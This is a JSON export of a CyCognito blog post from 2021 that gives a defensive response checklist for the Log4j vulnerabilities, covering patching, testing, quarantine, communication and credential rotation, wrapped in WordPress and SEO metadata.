{"id":265,"date":"2021-12-17T23:29:00","date_gmt":"2021-12-17T23:29:00","guid":{"rendered":"https:\/\/www.cycognito.com\/blog\/?p=265"},"modified":"2024-01-22T08:54:33","modified_gmt":"2024-01-22T16:54:33","slug":"setup-your-log4j-response-plan","status":"publish","type":"post","link":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/","title":{"rendered":"Set Up Your Log4J Response Plan"},"content":{"rendered":"\n<p>There is no \u201cone size fits all\u201d solution to the Apache Log4j issues yet, so at CyCognito we have implemented two CyCognito testing modules (one passive, one active). We have also performed an internal assessment on our exposure to these vulnerabilities in order to protect our customers\u2019 data.&nbsp;<\/p>\n\n\n\n<p>Based on our experience responding to these issues, advice from expert CISOs, and our community of customers, here are some steps for a simplified response plan you can use today and for future outbreaks. For a much more detailed response we recommend the&nbsp;<a href=\"https:\/\/www.cisa.gov\/uscert\/apache-log4j-vulnerability-guidance\">CISA Apache Log4j Vulnerability Guidance<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"627\" src=\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\" alt=\"\" class=\"wp-image-266\" srcset=\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg 1200w, https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1-512x268.jpg 512w, https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1-768x401.jpg 768w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/><\/figure>\n\n\n\n<p>Our security research and analyst teams recommend performing the following immediately:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>SELF-ASSESSMENT: If you are a software or technology services vendor your first priority should be ensuring your customers\u2019 data is secure.\n<ul class=\"wp-block-list\">\n<li>Investigate your Bill of Materials (BOM) in any software you provide.<\/li>\n\n\n\n<li>Check with your\u00a0<a href=\"\/blog\/accellion-supply-chain-attack\/\">third party partners<\/a>\u00a0that they are not affected in a way that affects your software or service.<\/li>\n\n\n\n<li><a href=\"https:\/\/www.splunk.com\/en_us\/blog\/security\/log-jammin-log4j-2-rce.html\">Monitor all logs<\/a>,\u00a0<a href=\"\/blog\/log4j-risky-business\/\">services<\/a>, and traces acting as if an incident did occur until you can be confident one did not.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>TRACE: Investigate your external attack surface first (<a href=\"\/platform\/\">with an external attack surface management platform like CyCognito<\/a>) and internal attack surface second to understand if and where you are using specifically vulnerable software.\u00a0<a href=\"\/blog\/log4j-risky-business\/\">Here\u2019s a list of software we know about so far<\/a>.<\/li>\n\n\n\n<li>PRIORITIZE: Start with the assets in your external attack surface that are vulnerable. An exploit to these vulnerable hosts can provide the initial access to a much wider breach and subsequent cleanup.<\/li>\n\n\n\n<li>CURE: Patch the Log4j versions that you know about in your external attack surface, and patch software which uses Log4j as patches are available in your internal attack surface.<\/li>\n\n\n\n<li>VACCINATE:&nbsp;<a href=\"https:\/\/github.com\/Cybereason\/Logout4Shell\">Inoculate any log4j applications<\/a>&nbsp;(use caution and read the details; this also requires a restart)<\/li>\n\n\n\n<li>TEST: Do ongoing and continuous testing of suspected assets for the vulnerability, including custom-built apps. Plan for this process to continue for years as this vulnerability is in a ubiquitous open source technology. New exploits will be disclosed and old images may be brought online.<\/li>\n\n\n\n<li>QUARANTINE: If you find systems that can\u2019t be patched or vaccinated consider taking them offline or putting them behind a firewall and continue monitoring affected assets for signs of compromise.<\/li>\n\n\n\n<li>MASK: Another way to protect systems that can\u2019t be patched or vaccinated is to use compensating controls like web application firewalls (WAF) and eXtended Detection and Response (XDR) that \u201cvirtually patch\u201d vulnerable hosts until other mitigations can be implemented.<\/li>\n\n\n\n<li>COMMUNICATE &#8211; Risk teams need to be aware of current status; business and technical risk managers need up-to-date information on\u00a0<a href=\"\/blog\/where-the-heck-do-i-start-or-why-we-created-remediation-planner\/\">remediation plans and progress<\/a>. Think about what to communicate to the CISO, Chief Risk Officer and business VP\u2019s responsible for profit and loss. Daily email briefings can reduce the need for redundant one on one discussions.\n<ul class=\"wp-block-list\">\n<li>PEOPLE: Keep in mind that while this looks like a technology crisis it\u2019s also a people problem. Make sure your people are informed about what to do, who to communicate with, and that they are expected and encouraged to take breaks, especially with the holidays approaching. Gratitude and appreciation for their efforts will go a long way!<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>DISCLOSURE: Whether affected or not, your management team may need to do something in this regard if you are a provider of software or services.\n<ul class=\"wp-block-list\">\n<li>If you are affected,\u00a0<a href=\"\/blog\/5-parts-of-good-breach-disclosure\/\">disclose<\/a>\u00a0to your customers and your partners in a rapid and public fashion so they can take precautions.\u00a0\u00a0<\/li>\n\n\n\n<li>If you are not affected, communicate your status and steps taken to ensure you were not affected.<\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>ASSUME BREACH: Log4j is an evolving situation and we do not yet understand all of the Tactics, Techniques and Procedures being used as we speak. Perform impact mitigating measures such as the following:\n<ul class=\"wp-block-list\">\n<li>Rotate security resources on affected systems, such as passwords, certificates, and tokens.&nbsp;<\/li>\n\n\n\n<li>Flag affected security resources listed above as potential Indicators of Compromise (IOCs), particularly with regards to North-South network flows.<\/li>\n\n\n\n<li>Continue to update SIEM solutions with evolving IOCs and run against historic logs&nbsp;&nbsp;<\/li>\n\n\n\n<li>Power cycle or redeploy affected resources to clear working memory without regard to initial investigation conclusions<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p>If you\u2019d like to connect with a CyCognito representative to see how we can help, please\u00a0<a href=\"\/contact\/\">contact us<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Based on our experience responding to these issues, advice from expert CISOs, and our community of customers here are steps for a simplified response plan you can use today and for future outbreaks.<\/p>\n","protected":false},"author":15,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[79],"class_list":["post-265","post","type-post","status-publish","format-standard","hentry","category-research","tag-log4j"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v24.7 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Set Up Your Log4J Response Plan | CyCognito Blog<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Set Up Your Log4J Response Plan | CyCognito Blog\" \/>\n<meta property=\"og:description\" content=\"Based on our experience responding to these issues, advice from expert CISOs, and our community of customers here are steps for a simplified response plan you can use today and for future outbreaks.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\" \/>\n<meta property=\"og:site_name\" content=\"CyCognito Blog\" \/>\n<meta property=\"article:published_time\" content=\"2021-12-17T23:29:00+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-01-22T16:54:33+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\" \/>\n<meta name=\"author\" content=\"Jim Wachhaus\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Jim Wachhaus\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\"},\"author\":{\"name\":\"Jim Wachhaus\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/26e362ecf750edd0380a7de5746cf8d0\"},\"headline\":\"Set Up Your Log4J Response Plan\",\"datePublished\":\"2021-12-17T23:29:00+00:00\",\"dateModified\":\"2024-01-22T16:54:33+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\"},\"wordCount\":727,\"publisher\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"keywords\":[\"Log4j\"],\"articleSection\":[\"Research\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\",\"url\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\",\"name\":\"Set Up Your Log4J Response Plan | CyCognito Blog\",\"isPartOf\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"datePublished\":\"2021-12-17T23:29:00+00:00\",\"dateModified\":\"2024-01-22T16:54:33+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage\",\"url\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"contentUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg\",\"width\":1200,\"height\":627},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.cycognito.com\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Set Up Your Log4J Response Plan\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#website\",\"url\":\"https:\/\/www.cycognito.com\/blog\/\",\"name\":\"Cycognito Blog\",\"description\":\"Research, Product News and Latest Updates\",\"publisher\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.cycognito.com\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#organization\",\"name\":\"Cycognito\",\"url\":\"https:\/\/www.cycognito.com\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/logo-1720x550-1.png\",\"contentUrl\":\"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/logo-1720x550-1.png\",\"width\":1720,\"height\":550,\"caption\":\"Cycognito\"},\"image\":{\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/logo\/image\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/26e362ecf750edd0380a7de5746cf8d0\",\"name\":\"Jim Wachhaus\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/79b6bf97cd7168a87f54b0b9f6ce82be?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/79b6bf97cd7168a87f54b0b9f6ce82be?s=96&d=mm&r=g\",\"caption\":\"Jim Wachhaus\"},\"description\":\"Was Director of Technical Product Marketing at CyCognito\",\"url\":\"https:\/\/www.cycognito.com\/blog\/author\/jim-wachhaus\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Set Up Your Log4J Response Plan | CyCognito Blog","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/","og_locale":"en_US","og_type":"article","og_title":"Set Up Your Log4J Response Plan | CyCognito Blog","og_description":"Based on our experience responding to these issues, advice from expert CISOs, and our community of customers here are steps for a simplified response plan you can use today and for future outbreaks.","og_url":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/","og_site_name":"CyCognito Blog","article_published_time":"2021-12-17T23:29:00+00:00","article_modified_time":"2024-01-22T16:54:33+00:00","og_image":[{"url":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg","type":"","width":"","height":""}],"author":"Jim Wachhaus","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Jim Wachhaus","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#article","isPartOf":{"@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/"},"author":{"name":"Jim Wachhaus","@id":"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/26e362ecf750edd0380a7de5746cf8d0"},"headline":"Set Up Your Log4J Response Plan","datePublished":"2021-12-17T23:29:00+00:00","dateModified":"2024-01-22T16:54:33+00:00","mainEntityOfPage":{"@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/"},"wordCount":727,"publisher":{"@id":"https:\/\/www.cycognito.com\/blog\/#organization"},"image":{"@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage"},"thumbnailUrl":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg","keywords":["Log4j"],"articleSection":["Research"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/","url":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/","name":"Set Up Your Log4J Response Plan | CyCognito Blog","isPartOf":{"@id":"https:\/\/www.cycognito.com\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage"},"image":{"@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage"},"thumbnailUrl":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg","datePublished":"2021-12-17T23:29:00+00:00","dateModified":"2024-01-22T16:54:33+00:00","breadcrumb":{"@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#primaryimage","url":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg","contentUrl":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/Log4j-Checklist-1.jpg","width":1200,"height":627},{"@type":"BreadcrumbList","@id":"https:\/\/www.cycognito.com\/blog\/setup-your-log4j-response-plan\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.cycognito.com\/blog\/"},{"@type":"ListItem","position":2,"name":"Set Up Your Log4J Response Plan"}]},{"@type":"WebSite","@id":"https:\/\/www.cycognito.com\/blog\/#website","url":"https:\/\/www.cycognito.com\/blog\/","name":"Cycognito Blog","description":"Research, Product News and Latest Updates","publisher":{"@id":"https:\/\/www.cycognito.com\/blog\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.cycognito.com\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.cycognito.com\/blog\/#organization","name":"Cycognito","url":"https:\/\/www.cycognito.com\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.cycognito.com\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/logo-1720x550-1.png","contentUrl":"https:\/\/www.cycognito.com\/blog\/wp-content\/uploads\/logo-1720x550-1.png","width":1720,"height":550,"caption":"Cycognito"},"image":{"@id":"https:\/\/www.cycognito.com\/blog\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/26e362ecf750edd0380a7de5746cf8d0","name":"Jim Wachhaus","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.cycognito.com\/blog\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/79b6bf97cd7168a87f54b0b9f6ce82be?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/79b6bf97cd7168a87f54b0b9f6ce82be?s=96&d=mm&r=g","caption":"Jim Wachhaus"},"description":"Was Director of Technical Product Marketing at CyCognito","url":"https:\/\/www.cycognito.com\/blog\/author\/jim-wachhaus\/"}]}},"_links":{"self":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts\/265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/users\/15"}],"replies":[{"embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/comments?post=265"}],"version-history":[{"count":3,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts\/265\/revisions"}],"predecessor-version":[{"id":681,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/posts\/265\/revisions\/681"}],"wp:attachment":[{"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/media?parent=265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/categories?post=265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.cycognito.com\/blog\/wp-json\/wp\/v2\/tags?post=265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}